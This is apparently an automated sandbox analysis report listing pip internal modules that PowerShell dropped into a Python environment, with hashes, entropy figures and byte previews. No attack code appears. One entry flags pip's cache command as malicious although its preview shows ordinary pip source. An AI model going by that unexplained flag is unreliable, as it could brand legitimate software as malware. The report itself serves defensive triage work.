                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7571
                                                                                                                                                                                                                              Entropy (8bit):4.916234524646561
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:etH/MWAzZHyJGP1aY3m/ul0hV5pm8qZKWNcGLsr7x:exgZSgtp3dl0hZm8qZKTx
                                                                                                                                                                                                                              MD5:C557B17BF17ABA520D83E9C717A6412F
                                                                                                                                                                                                                              SHA1:77F74CB160E1AD29C5C4F6B52A1D65C9AF5B0D66
                                                                                                                                                                                                                              SHA-256:FEB8445E90DC7B6727FD5BA938D9C957A442285D0FAAD8C5B86B674C5FBDAC86
                                                                                                                                                                                                                              SHA-512:E72272751B2E6BAF89307063F3779D91780FFD46BE4375134EF1F764A306A548543298D8D2984D0E718A486B5CCE07C1846909BC1741F3156A83688A0EB9EE1A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.j2..................e.........Z...G.d...d.e.........Z.y.)......N)...Values)...List)...cmdoptions)...make_target_python)...RequirementCommand..with_cleanup)...SUCCESS)...get_build_tracker)...check_legacy_setup_py_options)...ensure_dir..normalize_path..write_output)...TempDirectoryc.....................@.....e.Z.d.Z.d.Z.d.Z.d.d...Z.e.d.e.d.e.e.....d.e.f.d...........Z.y.)...DownloadCommandaL.... Download packages from:.. - PyPI (and other indexes) using requirement specifiers.. - VCS project urls.. - Local project directories.. - Local or remote source archives... pip also supports downloading from "requirements files", which provide. an easy way to specify a whole environment to be downloaded.. a..... %prog [options] <requirement specifier> [package-index-options] ..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4338
                                                                                                                                                                                                                              Entropy (8bit):5.138025759614219
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:6FIW6Zzm6HkhuEFuc8RZtNsjCw7h6ZlB/S9mIHUpG7RofsMY1PuXoTxzdV1PoA:ekxm6HYI1tmCw73TUw7RokDPgEX3oA
                                                                                                                                                                                                                              MD5:4A70A6078D91AA0B280D7D0C2DD0AB03
                                                                                                                                                                                                                              SHA1:2C277191E9D46D495CF938867336CFA069BDA785
                                                                                                                                                                                                                              SHA-256:E46749FB090BFBBA2BB87880A3936540F08A8773CDCB463E529CB5CD35822B91
                                                                                                                                                                                                                              SHA-512:3974F18AD86128BA4CA56716852BBEB220A0461CF4E3E4A9D39CD365C3F21F6546BC3A94DFA311C34D2BD0A24D90A7EFE208A6342356F3F8BC2AE311CA4A8170
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfd..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.f.d...Z.d.e.e.....f.d...Z...G.d...d.e.........Z.y.)......N)...Values)...AbstractSet..List)...cmdoptions)...Command)...SUCCESS)...freeze)...stdlib_pkgs..returnc.....................(.....t.........j...................d.k...S.).N)...........)...sys..version_info........NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/commands/freeze.py.._should_suppress_build_backendsr........s................g..%..%r....c...........................d.h.}.t.................r.|.h.d...z...}.|.S.).N..pip>......wheel..distribute..setuptools).r....)...pkgss.... r......_dev_pkgsr........s..........7.D..&..(.....5..5......Kr....c.....................:.....e.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.e.d.e.e.....d.e.f.d...Z.y.)...FreezeCommandzx. Output installed packages in requirements format... packages are listed in a case-insensitive sorted order.. z.. %pr
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2965
                                                                                                                                                                                                                              Entropy (8bit):5.322970924612373
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:WoZlrmKdi63K8vQKAkWP8UWOOCpn/H3ezeuyOJp8LZB4uykit:RbKKkUI3LWmp/HuzPyOD8GX
                                                                                                                                                                                                                              MD5:272A8D91A79D65E9F5DFD730755FC943
                                                                                                                                                                                                                              SHA1:D52A6D6522DA1B67EFB44C76EF39450274E6B19F
                                                                                                                                                                                                                              SHA-256:7431FAA88F5ADCBF8DE2CEBC7B092A8B7CB73F93C8AFC6048FA4993B734D87C3
                                                                                                                                                                                                                              SHA-512:E544FF2BF14A6E0864AD66E2408B238344460D8C8FDA6B1A96B7270145FAEA71E80157330CE6A08408D6B462E225C5FC3B21BBBF69D183C8B302A1BBFF130D3E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j$..................e.........Z...G.d...d.e.........Z.d.e.d.e.d.e.f.d...Z.y.)......N)...Values)...List)...Command)...ERROR..SUCCESS)...FAVORITE_HASH..STRONG_HASHES)...read_chunks..write_outputc.....................:.....e.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.e.d.e.e.....d.e.f.d...Z.y.)...HashCommandz.. Compute a hash of a local package archive... These can be used with --hash in a requirements file to do repeatable. installs.. z.%prog [options] <file> ...T..returnNc...........................|.j...................j...................d.d.d.t.........d.t.........d.j...................d.j...................t.....................................|.j...................j...................d.|.j.............................y.).Nz.-az.--algorithm..algorithm..storez$The hash algorithm to use: one of {}z., )...dest..choices..action..default
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1655
                                                                                                                                                                                                                              Entropy (8bit):5.549045946336593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:EmtV3gdvum0R/vy/kCWZkGRm2hpw5QNz/:1nmv+y/kCGxo2hQQz/
                                                                                                                                                                                                                              MD5:5E50F189B385FD4D24B4690230807536
                                                                                                                                                                                                                              SHA1:CFB90617A263887BC9989C7D61F90FF1F416D572
                                                                                                                                                                                                                              SHA-256:DF30477CA2D096B662C1678137D6D4D217AAB4BFA82570A28CDFF9EB3A205291
                                                                                                                                                                                                                              SHA-512:6250C0AFBAE58823A0D695F5F12772C58C458ADC55CDEE287E3B41B48E6CE093C4F52B698E1FCCCBECCF7EF760DC0A8626897550F4F96031CA04C8F372E07D03
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfl.........................V.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...Values)...List)...Command)...SUCCESS)...CommandErrorc.....................2.....e.Z.d.Z.d.Z.d.Z.d.Z.d.e.d.e.e.....d.e.f.d...Z.y.)...HelpCommandz.Show help for commandsz.. %prog <command>T..options..args..returnc.....................$.....d.d.l.m.}.m.}.m.}.....|.d.....}.|.|.v.r@..|.|.........}.d.|...d...g.}.|.r.|.j...................d.|...d.............t.........d.j...................|.....................|.|.........}.|.j...................j.............................t.........S.#.t.........$.r...t.........c.Y.S.w.x.Y.w.).Nr....)...commands_dict..create_command..get_similar_commandsz.unknown command ".."z.maybe you meant "z. - )...pip._internal.commandsr....r....r......IndexErrorr......appendr......join..parser..print_help)...selfr....r....r....r....r......cmd_name..guess..msg..commands.... .LC:\Users\xbov\Desktop\pyops\Lib\site-pack
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6702
                                                                                                                                                                                                                              Entropy (8bit):5.394171896965435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:6ZTKFopKxUU5v9ILHkAMbNTceCM+86BkIFsTSRRJ7xnzETh6N+C6E+V:6oop6Ut4pNEZ7JhET0NcE2
                                                                                                                                                                                                                              MD5:51F7ED4C27756EA523F8045C7CD7D394
                                                                                                                                                                                                                              SHA1:724E47B717ABB7E3401ADAB8EB2F898E49DF4338
                                                                                                                                                                                                                              SHA-256:4C6905C20DB857741ADAAC62319A2F720F3FD72FBF856EA65D02DAFD2CF660EA
                                                                                                                                                                                                                              SHA-512:FDEA6A8FBCDF9D56FD4CDD3CC77E12A4A7E7E020CC97EF1AAB9F4DE5EF42C1F66E114BF23DFF0C9EB59902D60E569754E23359E2043DCF618B3BABF5CE787D1A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$....e.jJ..................e&........Z'..G.d...d.e.........Z(y.)......N)...Values)...Any..Iterable..List..Optional..Union)...LegacyVersion..Version)...cmdoptions)...IndexGroupCommand)...ERROR..SUCCESS)...print_dist_installation_info)...CommandError..DistributionNotFound..PipError)...LinkCollector)...PackageFinder)...SelectionPreferences)...TargetPython)...PipSession)...write_outputc..........................e.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.e.d.e.e.....d.e.f.d...Z.....d.d.e.d.e.d.e.e.....d.e.e.....d.e.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.y.)...IndexCommandz=. Inspect information available from package indexes.. Tz&. %prog versions <package>. ..returnNc..........................t.........j...................|.j.....................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3957
                                                                                                                                                                                                                              Entropy (8bit):5.345402244743528
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:o6tZPm1hd7yeY9OGTlE8e3J8xJ79d2JrGJoHN1:osmj8eGTai2JrOot1
                                                                                                                                                                                                                              MD5:1CCAD3E7EBA0F7852325B6CF3E462635
                                                                                                                                                                                                                              SHA1:89937AE6CE55493F41A4811DB0F1E70C0FF5B84E
                                                                                                                                                                                                                              SHA-256:0F034BD9A1003E697AC9C8A9AA3E6EA36DFB7A4B099BCE0DED8DAFCB38BE61FC
                                                                                                                                                                                                                              SHA-512:CD2B576D80918130E55212E30E34797B2EEF275CE045DB2738D536581B64170D525D685446B0C536A0CE302B3BB48F5485A890F19FE78958C72DA2CC266B3F44
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vft...............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j4..................e.........Z...G.d...d.e.........Z.y.)......N)...Values)...Any..Dict..List)...default_environment)...print_json)...__version__)...cmdoptions)...Command)...SUCCESS)...BaseDistribution..get_environment)...stdlib_pkgs)...path_to_urlc.....................T.....e.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.e.d.e.e.....d.e.f.d...Z.d.e.d.e.e.e.f.....f.d...Z.y.)...InspectCommandzZ. Inspect the content of a Python environment and produce a report in JSON format.. Tz.. %prog [options]..returnNc.....................(.....|.j...................j...................d.d.d.d.............|.j...................j...................d.d.d.d.d.............|.j...................j...................t.........j.....................................|.j...................j...................d.|.j.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):28895
                                                                                                                                                                                                                              Entropy (8bit):5.323949912818273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:54H7jMWVr+k9SVA2mdDggWVjEkbwTGQlwIIX0yE9krDYY0F:54HXMWVj9SVA2kDg3ZXWLw7k/6kY0F
                                                                                                                                                                                                                              MD5:60950E82CEF33C91277CCF5BD4C16DC4
                                                                                                                                                                                                                              SHA1:F9E36CC00239EE3F9C18DAB18E52BD5BDC699CD7
                                                                                                                                                                                                                              SHA-256:E027AE19238D897D3C56AADF704C39D1AF18A1BDF6B96B334E2E5F2D6EB85A73
                                                                                                                                                                                                                              SHA-512:4D8BFB0E1C6EDB521DAC032466218E2D25EAE332CA369B672F101134ACEEDE2957A7758F5850D97E8B707547FD5CC159A9EB86C2E6821B7AC33D806C4A7CD17B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfnp........................^.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5m6Z6m7Z7m8Z8m9Z9..d.d.l:m;Z;..d.d.l<m=Z=m>Z>..d.d.l?m@Z@mAZA....e3eB........ZC..G.d...d.e.........ZD..........d-d.eEd.e.eF....d.e.eF....d.eEd.e.eF....d e.eF....f.d!..ZGd.e.eF....d.eEd eEf.d"..ZH........d.d#e.eE....d$e.eF....d%e.eF....d&e.eF....d'eEd eEf.d(..ZId)eJd*eEd+eEd eFf.d,..ZKy.)/.....N)...SUPPRESS_HELP..Values)...List..Optional)...print_json)...WheelCache)...cmdoptions)...make_target_python)...RequirementCommand..warn_if_run_as_root..with_cleanup)...ERROR..SUCCESS)...CommandError..InstallationError)...get_scheme)...get_environment)...InstallationReport)...get_build_tracker)...ConflictDetails..check_install_conflicts)...ins
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15382
                                                                                                                                                                                                                              Entropy (8bit):5.352601901671975
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Zp09xNSHVApMbLPGw/UUtXzUt4VvwOXkoLm2:Zp00HWpMPeCLt4tYvhUe
                                                                                                                                                                                                                              MD5:839002D1F6A23A38535865EBF2E729AE
                                                                                                                                                                                                                              SHA1:177CFDDAB23CEDB0E60417CE729C87C182F67ACA
                                                                                                                                                                                                                              SHA-256:0E4D533684739783EF34569324D4A415DBECD304A09021AC9997532A9A0969D7
                                                                                                                                                                                                                              SHA-512:AE5B7E8C4B1D48174700B0772F25363580A2EE75162DFE8DFDB55F4DFBEC32F9C95DC5B1E1E5B47252B1974CA88579DBC1F3AA83215E3B834D72CC6BA2D2F3A5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.0.............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$m%Z%..e.r.d.d.l&m'Z'....G.d...d.e.........Z(e.e(....Z)..e.jT..................e+........Z,..G.d...d.e.........Z-d.d.d.e.d.e.e.e.e.........e.e.....f.....f.d...Z/d.d.d.e.d.e.f.d...Z0y.)......N)...Values)...TYPE_CHECKING..Generator..List..Optional..Sequence..Tuple..cast....canonicalize_name)...cmdoptions)...IndexGroupCommand)...SUCCESS)...CommandError)...LinkCollector)...PackageFinder)...BaseDistribution..get_environment)...SelectionPreferences)...PipSession)...stdlib_pkgs)...tabulate..write_output)...DistributionVersionc.....................&.....e.Z.d.Z.U.d.Z.e.e.d.<...e.e.d.<...y.)..._DistWithLatestInfoz.Give the distribution object a couple of extra fields... These will be populated during ``get_outdated()``. This is dirty but.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7603
                                                                                                                                                                                                                              Entropy (8bit):5.547481338702017
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:MlgrzGCT6jBf+/zL/clfTjRodxcwDvPt+136O1+:7rzbTaWfklJJwDA1qz
                                                                                                                                                                                                                              MD5:4AE5AAA8E36A4746F679876F48502514
                                                                                                                                                                                                                              SHA1:B11F1F6FA1E72CC293F0203EE35FCE123CBBB0BA
                                                                                                                                                                                                                              SHA-256:755B919B40F7E7C70D55F2141CE9483614CDBF3139EF519BC95E77C94F90AC10
                                                                                                                                                                                                                              SHA-512:8CFDA91D5E4B1F9ED00ACAA9909E17D2E86E85577A299BD2321300A593ABC20BED756A6AC80530F6A2468A4CE5506140DBA90792006353FD69861FDCB1852E10
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfA..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..e.r.d.d.l.m%Z%....G.d...d.e%........Z&..e.jN..................e(........Z)..G.d...d.e.e.........Z*d.e.e.e+e+f.........d.e.d.....f.d...Z,d.e+d.e+d.d.f.d...Z-....d.d.e.d.....d.e.e.....d.e.e.....d.d.f.d...Z/d.e.e+....d.e+f.d...Z0y.) .....N)...OrderedDict)...Values)...TYPE_CHECKING..Dict..List..Optional)...parse)...Command)...SessionCommandMixin)...NO_MATCHES_FOUND..SUCCESS)...CommandError)...get_default_environment)...PyPI)...PipXmlrpcTransport)...indent_log)...write_output)...TypedDictc.....................2.....e.Z.d.Z.U.e.e.d.<...e.e.d.<...e.e.....e.d.<...y.)...TransformedHit..name..summary..versionsN)...__name__..__module__..__qualname__..str..__annotations__r............NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/co
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9710
                                                                                                                                                                                                                              Entropy (8bit):5.488871015851929
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:WVkQeqmXHqb2G8fD44WPsZVhNiln9lDBzrC:WVkD1XHqb2VfD44WPGDEln9lDZrC
                                                                                                                                                                                                                              MD5:126F083FE649DB67C53A8EB164A5364B
                                                                                                                                                                                                                              SHA1:E28D94761F05FF5D9ACD4B401D4615934D7AB79E
                                                                                                                                                                                                                              SHA-256:FF5A8598D6C763366F1F5E4B2C7C0167A7886EA6B693FA043DFC444B7BC5D6B1
                                                                                                                                                                                                                              SHA-512:91E59D5D80FAAE8A322551F265FB7BA24876E12643D99684C57A67F516D8B8EC5C8A6EC6142856AF428FF796D1A6588C54070AA5B769D84D829D0E0EDFC50BAC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j,..................e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d.e.e.....d.e.e.d.d.f.....f.d...Z.d.e.e.....d.e.d.e.d.e.f.d...Z.y.)......N)...Values)...Generator..Iterable..Iterator..List..NamedTuple..Optional)...canonicalize_name)...Command)...ERROR..SUCCESS)...BaseDistribution..get_default_environment)...write_outputc.....................:.....e.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.e.d.e.e.....d.e.f.d...Z.y.)...ShowCommandzx. Show information about one or more installed packages... The output is in RFC-compliant mail header format.. z$. %prog [options] <package> ...T..returnNc..........................|.j...................j...................d.d.d.d.d.d.............|.j...................j...................d.|.j.............................y.).Nz.-fz.--files..files..store_trueFz7Show the full list of
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4708
                                                                                                                                                                                                                              Entropy (8bit):5.3928960891687465
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:dzi8vwiXr8m5h1Katodq4H7mS2pgRKUNdqbcxkOAqdRXNlaKmbQCwG33PLk/gNHx:dzrQm5vhotiS26bTlfmbQrGPLkyuh5w
                                                                                                                                                                                                                              MD5:A5F05A3B96C798EC740A2A089E76AE0C
                                                                                                                                                                                                                              SHA1:A9FBC5EB454DAFB0EA34B4573092741E46377D8F
                                                                                                                                                                                                                              SHA-256:CDFFF7BD44DF14AD3B1C0B8D76DC5B60CF9EC4E8D1D4C0DAA93B126844A13F6F
                                                                                                                                                                                                                              SHA-512:F36B96FB754A26474435B35445782357A165DF3C167EE9CB0ADA513C66462922EE499BF1340B8C79CA7550C3B4A3E0591045EFF7CB9FB9EB834EE4EA2DB5D8C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j4..................e.........Z...G.d...d.e.e.........Z.y.)......N)...Values)...List)...canonicalize_name)...cmdoptions)...Command)...SessionCommandMixin..warn_if_run_as_root)...SUCCESS)...InstallationError)...parse_requirements)...install_req_from_line.#install_req_from_parsed_requirement)...check_externally_managed.(protect_pip_from_modification_on_windowsc.....................6.....e.Z.d.Z.d.Z.d.Z.d.d...Z.d.e.d.e.e.....d.e.f.d...Z.y.)...UninstallCommandaB.... Uninstall packages... pip is able to uninstall most installed packages. Known exceptions are:.. - Pure distutils packages installed with ``python setup.py install``, which. leave behind no metadata to determine what files were installed.. - Script wrappers installed by ``python setup.py develop``.. zU. %pro
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8938
                                                                                                                                                                                                                              Entropy (8bit):4.982600216584305
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:E+lxjGWJCLysF3Ss+4haGNc1b2Bxh/xN3FFfSjompjm8K85zGbFWOZ3rYChDy:mLysMs78GN22DN3n+Vpjm8TSWOdy
                                                                                                                                                                                                                              MD5:8A285541AE3FBF3B5B69A9280EB53C94
                                                                                                                                                                                                                              SHA1:FA34F2401D995A84A608868C4007FAD4BDCEC201
                                                                                                                                                                                                                              SHA-256:FB9B4916A16AD9B00CB5AFC381DBD3C10F664E85AB27E79B4E507FBA9E829779
                                                                                                                                                                                                                              SHA-512:8777EF1736FA480A53D9F0BEF39AC5C629483F1980348DFBA5212E68BFBDDDD70487660206B784DCF29A98EF86CED796D6CE1FDD659FFFBBD737B8508D6549A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfL...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j>..................e ........Z!..G.d...d.e.........Z"y.)......N)...Values)...List)...WheelCache)...cmdoptions)...RequirementCommand..with_cleanup)...SUCCESS)...CommandError)...get_build_tracker)...InstallRequirement..check_legacy_setup_py_options)...ensure_dir..normalize_path)...TempDirectory)...build..should_build_for_wheel_commandc.....................@.....e.Z.d.Z.d.Z.d.Z.d.d...Z.e.d.e.d.e.e.....d.e.f.d...........Z.y.)...WheelCommanda..... Build Wheel archives for your requirements and dependencies... Wheel is a built-package format, and offers the advantage of not. recompiling your software during every install. For more details, see the. wheel docs: https://wheel.readthedocs.io/en/latest/.. 'pip wheel' uses the build system interface as
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7944
                                                                                                                                                                                                                              Entropy (8bit):4.473664162805842
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:w8xbpHs19dmOK5FwBH0n35nPdSQt7H1T71aV6BCZqxH9OgQOaa9OVmTHo3lipR8E:Xm19dKNlPtHo3EWOHlxIW
                                                                                                                                                                                                                              MD5:D796FBCA95115A0D56011A05BD20703C
                                                                                                                                                                                                                              SHA1:70C2EF8C6253E4EFCB39D5868E051CA89BBD535F
                                                                                                                                                                                                                              SHA-256:C60EFAFD9144042EB3A10DE05CB45F31925FB78CF66B44701F81841590BA9E75
                                                                                                                                                                                                                              SHA-512:75AA8FD0BFBEF60E7B7FBF99DEF4A47ECF4BE5B221DD1522137364D2129F52C8F8E27D252407E79E6FE9F2B92C065074E67C16BE9DDE270A1A685F079422CCC9
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import os.import textwrap.from optparse import Values.from typing import Any, List..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.exceptions import CommandError, PipError.from pip._internal.utils import filesystem.from pip._internal.utils.logging import getLogger..logger = getLogger(__name__)...class CacheCommand(Command):. """. Inspect and manage pip's wheel cache... Subcommands:.. - dir: Show the cache directory.. - info: Show information about the cache.. - list: List filenames of packages stored in the cache.. - remove: Remove one or more package from the cache.. - purge: Remove all items from the cache... ``<pattern>`` can be a glob expression or a package name.. """.. ignore_require_venv = True. usage = """. %prog dir. %prog info. %prog list [<pattern>] [--format=[human, abspath]]. %prog remove <pattern>. %prog purge. """..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1782
                                                                                                                                                                                                                              Entropy (8bit):4.26713058625802
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:lT6t5jdySvtRqfJIKjQT13+sEOuJCIVlcjAHQ8z/kjve5EBJGfqXC:GySCxIL5ufO+tAe9AvejqS
                                                                                                                                                                                                                              MD5:C3CF8E021FD0026A5FD2A1FE8D5AC19B
                                                                                                                                                                                                                              SHA1:ADDBB931C27BF8678E0488E5B729D7E96E49385B
                                                                                                                                                                                                                              SHA-256:45BD77436F32A0B8748F5829C79494D239517AC35CB76D5E40246C9DA3BDC4A0
                                                                                                                                                                                                                              SHA-512:03E79F63D3D3BE03C44400A337B9A8730BA82C60E98AC21E53F1B33F7EB8B8287D785E522A027B1D63C2FC818C0AAC246FFED2A4F5344D3EEF4FAF2BB3F5EDCE
                                                                                                                                                                                                                              Malicious:false
